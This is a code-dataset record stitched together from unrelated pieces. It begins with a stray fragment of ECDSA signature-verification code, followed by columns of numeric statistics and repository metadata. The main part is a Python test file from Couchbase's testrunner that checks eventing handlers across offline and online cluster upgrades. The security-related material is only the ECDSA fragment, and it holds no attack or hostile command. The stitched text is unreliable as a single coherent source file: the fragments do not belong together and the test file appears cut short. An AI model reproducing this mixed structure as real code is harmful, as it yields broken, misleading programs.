signature = b' W\x83\xe5w\x8f\x07\x19EV\xba\x9d\x90\x9f\xfd \x81&\x0f\xa1L\xa00zK0\x08\xf78/\x9d\x0c\x06JFx[*Z\xfe\xd1F\x8d\x9f \x19\xad\xd9\xc9\xbf\xd3\x1br\xdd\x8e\x8ei\xf8\xd2\xf40\xad\xc6\x9c\xe5'
message = 'foo'
pubkey = ecda.verify_message(message, signature)
signature = b'\x1f9\xb6_\x85\xbdr7\\\xb2N\xfb~\x82\xb7E\x80\xf1M\xa4EP=\x8elJ\x1d[t\xab%v~a\xb7\xdbS\x86;~N\xd2!\xf1k=\xb6tMm-\xf1\xd9\xfc\xf3`\xbf\xd5)\x1b\xb3N\x92u/'
message = 'This is a short Message'
pubkey = ecda.verify_message(message, signature)
message = '1234567890'
signature = b' 7\x82\xe2\xad\xdc\xdb]~\xd6\xa8J\xdc\xa5\xf4\x13<i\xb9\xc0\xdcEc\x10\xd0)t\xc7^\xecw\x05 U\x91\x0f\xa2\xce\x04\xa1\xdb\xb0\nQ\xbd\xafP`\\\x8bb\x99\xcf\xe0;\x01*\xe9D]\xad\xd9l\x1f\x05'
pubkey = ecda.verify_message(message, signature)
| 58.214876
| 215
| 0.704429
| 897
| 7,044
| 5.462653
| 0.230769
| 0.068571
| 0.041633
| 0.058776
| 0.830408
| 0.803469
| 0.803469
| 0.803469
| 0.803469
| 0.803469
| 0
| 0.186721
| 0.168228
| 7,044
| 120
| 216
| 58.7
| 0.649599
| 0.00724
| 0
| 0.737864
| 0
| 0.116505
| 0.475966
| 0.43176
| 0
| 0
| 0
| 0
| 0
| 1
| 0.087379
| false
| 0
| 0.174757
| 0
| 0.31068
| 0.009709
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
677b338c7e9b106a7535bd5623ff2fe5567d10f1
| 37,590
|
py
|
Python
|
pytests/eventing/eventing_upgrade.py
|
GauthamBanasandra/testrunner
|
98260a63d535b3fd52f31bfa7b964b4b7afc943a
|
[
"Apache-2.0"
] | null | null | null |
pytests/eventing/eventing_upgrade.py
|
GauthamBanasandra/testrunner
|
98260a63d535b3fd52f31bfa7b964b4b7afc943a
|
[
"Apache-2.0"
] | null | null | null |
pytests/eventing/eventing_upgrade.py
|
GauthamBanasandra/testrunner
|
98260a63d535b3fd52f31bfa7b964b4b7afc943a
|
[
"Apache-2.0"
] | null | null | null |
import Queue
import copy
from TestInput import TestInputSingleton
from couchbase_helper.tuq_helper import N1QLHelper
from newupgradebasetest import NewUpgradeBaseTest
from membase.api.rest_client import RestHelper
from membase.helper.cluster_helper import ClusterOperationHelper
from pytests.basetestcase import BaseTestCase
from lib.testconstants import STANDARD_BUCKET_PORT
from lib.membase.api.rest_client import RestConnection
import logging
from pytests.eventing.eventing_constants import HANDLER_CODE, EXPORTED_FUNCTION
from testconstants import COUCHBASE_VERSION_2
import os
import json
log = logging.getLogger()
class EventingUpgrade(NewUpgradeBaseTest, BaseTestCase):
def setUp(self):
super(EventingUpgrade, self).setUp()
self.rest = RestConnection(self.master)
self.server = self.master
self.queue = Queue.Queue()
self.src_bucket_name = self.input.param('src_bucket_name', 'src_bucket')
self.eventing_log_level = self.input.param('eventing_log_level', 'INFO')
self.dst_bucket_name = self.input.param('dst_bucket_name', 'dst_bucket')
self.dst_bucket_name1 = self.input.param('dst_bucket_name1', 'dst_bucket1')
self.dst_bucket_curl = self.input.param('dst_bucket_curl','dst_bucket_curl')
self.source_bucket_mutation = self.input.param('source_bucket_mutation', 'source_bucket_mutation')
self.metadata_bucket_name = self.input.param('metadata_bucket_name', 'metadata')
self.n1ql_op_dst=self.input.param('n1ql_op_dst', 'n1ql_op_dst')
self.gens_load = self.generate_docs(self.docs_per_day)
self.upgrade_version = self.input.param("upgrade_version")
def tearDown(self):
super(EventingUpgrade, self).tearDown()
def test_offline_upgrade_with_eventing_pre_vulcan(self):
self._install(self.servers[:self.nodes_init])
self.operations(self.servers[:self.nodes_init], services="kv,kv,index,n1ql")
self.create_buckets()
# Load the data in older version
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
# upgrade all the nodes
upgrade_threads = self._async_update(self.upgrade_version, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.sleep(120)
success_upgrade = True
while not self.queue.empty():
success_upgrade &= self.queue.get()
if not success_upgrade:
self.fail("Upgrade failed!")
self.add_built_in_server_user()
# Add eventing node to the cluster after upgrade
self.cluster.rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=["eventing"])
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
self.sleep(180)
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
### for this to work upgrade_version > 5.5
def test_offline_upgrade_with_eventing(self):
self._install(self.servers[:self.nodes_init])
self.operations(self.servers[:self.nodes_init], services="kv,eventing,index,n1ql")
self.create_buckets()
# Load the data in older version
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op function
log.info("Deploy the function in the initial version")
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
# offline upgrade all the nodes
upgrade_threads = self._async_update(self.upgrade_version, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.sleep(120)
success_upgrade = True
while not self.queue.empty():
success_upgrade &= self.queue.get()
if not success_upgrade:
self.fail("Upgrade failed!")
self.add_built_in_server_user()
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op with timer function
self.import_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
# Validate the data
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
# Load the data in older version
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
#Deploy the Source bucket handler
self.import_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
# Validate the data
self.validate_eventing(self.source_bucket_mutation, 2*self.docs_per_day * 2016)
# Deploy the curl handler
self.import_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
### index creation for n1ql
self._create_primary_index()
# deploy n1ql handler
self.import_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
# Delete the data on source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False, op_type='delete')
# Delete the data on SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False, op_type='delete')
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, 0)
self.validate_eventing(self.dst_bucket_name1, 0)
self.validate_eventing(self.source_bucket_mutation,0)
self.validate_eventing(self.dst_bucket_curl,0)
self.validate_eventing(self.n1ql_op_dst,0)
## pause handler
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.pause_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.N1QL_OP)
# add data to source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
# add data to SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
# resume function
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.resume_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Undeploy and delete both the functions
self.undeploy_and_delete_function("test_import_function_1")
self.undeploy_and_delete_function("test_import_function_2")
self.undeploy_and_delete_function('bucket_op_sbm')
self.undeploy_and_delete_function('bucket_op_curl')
self.undeploy_and_delete_function('n1ql_op')
### for this to work current version > 5.5
def test_offline_upgrade_with_eventing_post_vulcan(self):
self._install(self.servers[:self.nodes_init])
self.operations(self.servers[:self.nodes_init], services="kv,eventing,index,n1ql")
self.create_buckets()
# Load the data in older version
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op function
log.info("Deploy the function in the initial version")
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
# Deploy the bucket op with timer function
self.import_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
# Validate the data
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
# offline upgrade all the nodes
upgrade_threads = self._async_update(self.upgrade_version, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.sleep(120)
success_upgrade = True
while not self.queue.empty():
success_upgrade &= self.queue.get()
if not success_upgrade:
self.fail("Upgrade failed!")
self.add_built_in_server_user()
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Load the data source bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.import_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
# Validate the data
self.validate_eventing(self.source_bucket_mutation, 2*self.docs_per_day * 2016)
# Deploy the Source bucket handler
self.import_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
### index creation for n1ql
self._create_primary_index()
# Deploy the n1ql handler
self.import_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
# Delete the data on source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False, op_type='delete')
# Delete the data on SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False, op_type='delete')
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, 0)
self.validate_eventing(self.dst_bucket_name1, 0)
self.validate_eventing(self.source_bucket_mutation,0)
self.validate_eventing(self.dst_bucket_curl,0)
self.validate_eventing(self.n1ql_op_dst,0)
## pause resume handler
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.pause_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.N1QL_OP)
# add data to source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.resume_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
self.validate_eventing(self.source_bucket_mutation, 2*self.docs_per_day * 2016)
# Undeploy and delete both the functions
self.undeploy_and_delete_function("test_import_function_1")
self.undeploy_and_delete_function("test_import_function_2")
self.undeploy_and_delete_function('bucket_op_sbm')
self.undeploy_and_delete_function('bucket_op_curl')
self.undeploy_and_delete_function('n1ql_op')
def test_online_upgrade_with_regular_rebalance_with_eventing(self):
self._install(self.servers[:self.nodes_init])
self.initial_version = self.upgrade_version
self._install(self.servers[self.nodes_init:self.num_servers])
self.operations(self.servers[:self.nodes_init], services="kv,eventing,index,n1ql")
self.create_buckets()
# Load the data in older version
log.info("Load the data in older version in the initial version")
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op function
log.info("Deploy the function in the initial version")
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
# Do validations
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
# swap and rebalance the servers
self.online_upgrade(services=["kv", "eventing", "index", "n1ql"])
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
self.add_built_in_server_user()
# Deploy the bucket op with timer function
self.import_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
# Do validations
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
# Load the data source bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.import_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
# Validate the data
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Deploy the Source bucket handler
self.import_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
### index creation for n1ql
self._create_primary_index()
# Deploy the n1ql handler
self.import_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
# Delete the data on source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False, op_type='delete')
# Delete the data on SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False, op_type='delete')
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, 0)
self.validate_eventing(self.dst_bucket_name1, 0)
self.validate_eventing(self.source_bucket_mutation, 0)
self.validate_eventing(self.dst_bucket_curl, 0)
self.validate_eventing(self.n1ql_op_dst, 0)
## pause resume handler
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.pause_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.N1QL_OP)
# add data to source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.resume_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Undeploy and delete both the functions
self.undeploy_and_delete_function("test_import_function_1")
self.undeploy_and_delete_function("test_import_function_2")
self.undeploy_and_delete_function('bucket_op_sbm')
self.undeploy_and_delete_function('bucket_op_curl')
self.undeploy_and_delete_function('n1ql_op')
def test_online_upgrade_with_swap_rebalance_with_eventing(self):
self._install(self.servers[:self.nodes_init])
self.initial_version = self.upgrade_version
self._install(self.servers[self.nodes_init:self.num_servers])
self.operations(self.servers[:self.nodes_init], services="kv,kv,eventing,index,n1ql")
self.create_buckets()
# Load the data in older version
log.info("Load the data in older version in the initial version")
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op function
log.info("Deploy the function in the initial version")
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
# Do validations
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
# swap and rebalance the servers
self.online_upgrade_swap_rebalance(services=["kv","kv", "eventing","index","n1ql"])
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
self.add_built_in_server_user()
# Deploy the bucket op with timer function
self.import_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
# Do validations
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
# Load the data source bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.import_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
# Validate the data
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Deploy the Source bucket handler
self.import_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
### index creation for n1ql
self._create_primary_index()
# Deploy the n1ql handler
self.import_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
# Delete the data on source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False, op_type='delete')
# Delete the data on SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False, op_type='delete')
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, 0)
self.validate_eventing(self.dst_bucket_name1, 0)
self.validate_eventing(self.source_bucket_mutation, 0)
self.validate_eventing(self.dst_bucket_curl, 0)
self.validate_eventing(self.n1ql_op_dst, 0)
## pause resume handler
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.pause_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.N1QL_OP)
# add data to source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.resume_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Undeploy and delete both the functions
self.undeploy_and_delete_function("test_import_function_1")
self.undeploy_and_delete_function("test_import_function_2")
self.undeploy_and_delete_function('bucket_op_sbm')
self.undeploy_and_delete_function('bucket_op_curl')
self.undeploy_and_delete_function('n1ql_op')
def test_online_upgrade_with_failover_rebalance_with_eventing(self):
self._install(self.servers[:self.nodes_init])
self.initial_version = self.upgrade_version
self._install(self.servers[self.nodes_init:self.num_servers])
self.operations(self.servers[:self.nodes_init], services="kv,eventing,index,n1ql")
self.create_buckets()
# Load the data in older version
log.info("Load the data in older version in the initial version")
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
# Deploy the bucket op function
log.info("Deploy the function in the initial version")
self.import_function(EXPORTED_FUNCTION.BUCKET_OP)
# Do validations
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
# swap and rebalance the servers
self.online_upgrade_with_failover(services=["kv", "eventing", "index", "n1ql"])
self.restServer = self.get_nodes_from_services_map(service_type="eventing")
self.rest = RestConnection(self.restServer)
self.add_built_in_server_user()
# Deploy the bucket op with timer function
self.import_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
# Do validations
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
# Load the data source bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.import_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
# Validate the data
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Deploy the Source bucket handler
self.import_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
# Validate the data
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
### index creation for n1ql
self._create_primary_index()
# Deploy the n1ql handler
self.import_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
# Delete the data on source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False, op_type='delete')
# Delete the data on SBM bucket
self.load(self.gens_load, buckets=self.sbm, verify_data=False, op_type='delete')
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, 0)
self.validate_eventing(self.dst_bucket_name1, 0)
self.validate_eventing(self.source_bucket_mutation, 0)
self.validate_eventing(self.dst_bucket_curl, 0)
self.validate_eventing(self.n1ql_op_dst, 0)
## pause resume handler
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.pause_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.pause_function(EXPORTED_FUNCTION.N1QL_OP)
# add data to source bucket
self.load(self.gens_load, buckets=self.src_bucket, verify_data=False)
self.load(self.gens_load, buckets=self.sbm, verify_data=False)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.BUCKET_OP_WITH_TIMER)
self.resume_function(EXPORTED_FUNCTION.SBM_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.CURL_BUCKET_OP)
self.resume_function(EXPORTED_FUNCTION.N1QL_OP)
# Validate the data for both the functions
self.validate_eventing(self.dst_bucket_name, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_name1, self.docs_per_day * 2016)
self.validate_eventing(self.dst_bucket_curl, self.docs_per_day * 2016)
self.validate_eventing(self.n1ql_op_dst, self.docs_per_day * 2016)
self.validate_eventing(self.source_bucket_mutation, 2 * self.docs_per_day * 2016)
# Undeploy and delete both the functions
self.undeploy_and_delete_function("test_import_function_1")
self.undeploy_and_delete_function("test_import_function_2")
self.undeploy_and_delete_function('bucket_op_sbm')
self.undeploy_and_delete_function('bucket_op_curl')
self.undeploy_and_delete_function('n1ql_op')
def import_function(self, function):
script_dir = os.path.dirname(__file__)
abs_file_path = os.path.join(script_dir, function)
fh = open(abs_file_path, "r")
body = json.loads(fh.read())
# import the previously exported function
self.rest.save_function(body["appname"], body)
self.deploy_function(body)
def online_upgrade(self, services=None):
servers_in = self.servers[self.nodes_init:self.num_servers]
self.cluster.rebalance(self.servers[:self.nodes_init], servers_in, [], services=services)
log.info("Rebalance in all {0} nodes" \
.format(self.input.param("upgrade_version", "")))
self.sleep(self.sleep_time)
status, content = ClusterOperationHelper.find_orchestrator(self.master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}". \
format(status, content))
FIND_MASTER = False
for new_server in servers_in:
if content.find(new_server.ip) >= 0:
self._new_master(new_server)
FIND_MASTER = True
self.log.info("%s node %s becomes the master" \
% (self.input.param("upgrade_version", ""), new_server.ip))
break
if self.input.param("initial_version", "")[:5] in COUCHBASE_VERSION_2 \
and not FIND_MASTER:
raise Exception( \
"After rebalance in {0} nodes, {0} node doesn't become master" \
.format(self.input.param("upgrade_version", "")))
servers_out = self.servers[:self.nodes_init]
log.info("Rebalanced out all old version nodes")
self.cluster.rebalance(self.servers[:self.num_servers], [], servers_out)
self._new_master(self.servers[self.nodes_init])
def online_upgrade_swap_rebalance(self, services=None):
servers_in = self.servers[self.nodes_init:self.num_servers]
self.sleep(self.sleep_time)
status, content = ClusterOperationHelper.find_orchestrator(self.master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}". \
format(status, content))
i = 1
for server_in, service_in in zip(servers_in[1:], services[1:]):
log.info(
"Swap rebalance nodes : server_in: {0} service_in:{1} service_out:{2}".format(server_in, service_in,
self.servers[i]))
self.cluster.rebalance(self.servers[:self.nodes_init], [server_in], [self.servers[i]],
services=[service_in])
i += 1
self._new_master(self.servers[self.nodes_init + 1])
self.cluster.rebalance(self.servers[self.nodes_init + 1:self.num_servers], [servers_in[0]], [self.servers[0]],
services=[services[0]])
def online_upgrade_with_failover(self, services=None):
servers_in = self.servers[self.nodes_init:self.num_servers]
self.cluster.rebalance(self.servers[:self.nodes_init], servers_in, [], services=services)
log.info("Rebalance in all {0} nodes" \
.format(self.input.param("upgrade_version", "")))
self.sleep(self.sleep_time)
status, content = ClusterOperationHelper.find_orchestrator(self.master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}". \
format(status, content))
FIND_MASTER = False
for new_server in servers_in:
if content.find(new_server.ip) >= 0:
self._new_master(new_server)
FIND_MASTER = True
self.log.info("%s node %s becomes the master" \
% (self.input.param("upgrade_version", ""), new_server.ip))
break
if self.input.param("initial_version", "")[:5] in COUCHBASE_VERSION_2 \
and not FIND_MASTER:
raise Exception( \
"After rebalance in {0} nodes, {0} node doesn't become master" \
.format(self.input.param("upgrade_version", "")))
servers_out = self.servers[:self.nodes_init]
self._new_master(self.servers[self.nodes_init])
log.info("failover and rebalance nodes")
self.cluster.failover(self.servers[:self.num_servers], failover_nodes=servers_out, graceful=False)
self.cluster.rebalance(self.servers[:self.num_servers], [], servers_out)
self.sleep(180)
def _new_master(self, server):
self.master = server
self.rest = RestConnection(self.master)
self.rest_helper = RestHelper(self.rest)
def create_buckets(self):
self.rest.set_service_memoryQuota(service='memoryQuota', memoryQuota=1000)
self.rest.delete_bucket("default")
self.bucket_size = 100
log.info("Create the required buckets in the initial version")
bucket_params = self._create_bucket_params(server=self.server, size=self.bucket_size,
replicas=self.num_replicas)
self.cluster.create_standard_bucket(name=self.src_bucket_name, port=STANDARD_BUCKET_PORT + 1,
bucket_params=bucket_params)
self.src_bucket = RestConnection(self.master).get_buckets()
self.sleep(60)
self.cluster.create_standard_bucket(name=self.dst_bucket_name, port=STANDARD_BUCKET_PORT + 2,
bucket_params=bucket_params)
self.sleep(60)
self.cluster.create_standard_bucket(name=self.metadata_bucket_name, port=STANDARD_BUCKET_PORT + 3,
bucket_params=bucket_params)
self.sleep(60)
self.cluster.create_standard_bucket(name=self.dst_bucket_name1, port=STANDARD_BUCKET_PORT + 4,
bucket_params=bucket_params)
self.sleep(60)
self.cluster.create_standard_bucket(name=self.dst_bucket_curl, port=STANDARD_BUCKET_PORT + 5,
bucket_params=bucket_params)
self.sleep(60)
self.cluster.create_standard_bucket(name=self.source_bucket_mutation, port=STANDARD_BUCKET_PORT + 6,
bucket_params=bucket_params)
self.sleep(60)
self.cluster.create_standard_bucket(name=self.n1ql_op_dst, port=STANDARD_BUCKET_PORT + 7,
bucket_params=bucket_params)
self.buckets = RestConnection(self.master).get_buckets()
self.sbm = RestConnection(self.master).get_bucket_by_name(self.source_bucket_mutation)
def validate_eventing(self, bucket_name, no_of_docs):
count = 0
stats_dst = self.rest.get_bucket_stats(bucket_name)
while stats_dst["curr_items"] != no_of_docs and count < 20:
message = "Waiting for handler code to complete bucket operations... Current : {0} Expected : {1}". \
format(stats_dst["curr_items"], no_of_docs)
self.sleep(30, message=message)
count += 1
stats_dst = self.rest.get_bucket_stats(bucket_name)
if stats_dst["curr_items"] != no_of_docs:
log.info("Eventing is not working as expected after upgrade")
raise Exception(
"Bucket operations from handler code took lot of time to complete or didn't go through. Current : {0} "
"Expected : {1} ".format(stats_dst["curr_items"], no_of_docs))
def deploy_function(self, body, deployment_fail=False, wait_for_bootstrap=True):
body['settings']['deployment_status'] = True
body['settings']['processing_status'] = True
content1 = self.rest.create_function(body['appname'], body)
log.info("deploy Application : {0}".format(content1))
if deployment_fail:
res = json.loads(content1)
if not res["compile_success"]:
return
else:
raise Exception("Deployment is expected to be failed but no message of failure")
if wait_for_bootstrap:
# wait for the function to come out of bootstrap state
self.wait_for_handler_state(body['appname'], "deployed")
def undeploy_and_delete_function(self, function):
log.info("Undeploying function : {0}".format(function))
content = self.rest.undeploy_function(function)
self.wait_for_handler_state(function,"undeployed")
self.sleep(180)
log.info("Deleting function : {0}".format(function))
content1 = self.rest.delete_single_function(function)
def pause_function(self, function):
script_dir = os.path.dirname(__file__)
abs_file_path = os.path.join(script_dir, function)
fh = open(abs_file_path, "r")
body = json.loads(fh.read())
body['settings']['deployment_status'] = True
body['settings']['processing_status'] = False
self.refresh_rest_server()
# save the function so that it is visible in UI
#content = self.rest.save_function(body['appname'], body)
# undeploy the function
content1 = self.rest.set_settings_for_function(body['appname'], body['settings'])
log.info("Pause Application : {0}".format(body['appname']))
self.wait_for_handler_state(body['appname'], "paused")
